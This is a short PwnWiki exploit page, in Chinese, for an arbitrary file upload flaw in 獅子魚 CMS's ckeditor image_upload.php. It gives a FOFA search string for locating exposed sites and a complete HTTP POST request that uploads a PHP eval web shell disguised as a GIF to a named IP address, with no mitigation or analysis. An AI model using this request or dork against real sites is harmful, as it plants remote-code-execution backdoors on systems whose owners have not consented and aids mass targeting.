獅子魚CMS image upload.php 任意文件上傳漏洞

From PwnWiki
Revision as of 10:22, 16 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "/seller.php?s=/Public/login" </pre> ==Request== <pre> POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2 Host: 47.95.36.147 Content-Type:...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

"/seller.php?s=/Public/login"

Request

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2
Host: 47.95.36.147
Content-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 208

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php @eval($_POST[pq]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—
Retrieved from "https://pwnwiki.com/index.php?title=獅子魚CMS_image_upload.php_任意文件上傳漏洞&oldid=2871"